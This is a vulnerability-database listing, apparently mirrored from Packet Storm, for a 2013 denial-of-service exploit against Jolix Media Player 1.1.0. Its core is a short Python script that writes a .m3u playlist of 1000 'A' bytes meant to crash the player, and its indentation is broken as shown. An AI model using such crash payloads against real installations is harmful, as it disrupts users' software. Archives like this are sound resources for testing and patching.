Lucene search
K

Jolix Media Player 1.1.0 Denial Of Service

🗓️ 10 Jul 2013 00:00:00Reported by IndonesiaGokilTeamType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 16 Views

Jolix Media Player 1.1.0 Denial Of Service exploit, version 1.1.0, download link: http://www.jolixtools.com/downloads/jolix-media-player-setup.exe, tested on Windows xp sp 3, release date: 09.07.2013, by IndonesiaGokilTea

Code
`#!/usr/bin/python  
print """  
[+]Judul Ledakan:Jolix Media Player (.m3u) Denial of Service Exploit  
[+]Celah versi: Version 1.1.0  
[+]Mengunduh produk: http://www.jolixtools.com/downloads/jolix-media-player-setup.exe  
[+]Hari Tanggal Tahun: 09.07.2013  
[+]Penulis: IndonesiaGokilTeam  
[+]Dicoba di sistem operasi: Windows xp sp 3  
"""  
  
sampah = "\x41" * 1000  
ledakan = sampah  
  
try:  
rst= open("SampahMasyarakat.m3u",'w')  
rst.write(ledakan)  
rst.close()  
print("\nFile Sampah Masyarakat dibuat !\n")  
except:  
print "Gagal"  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation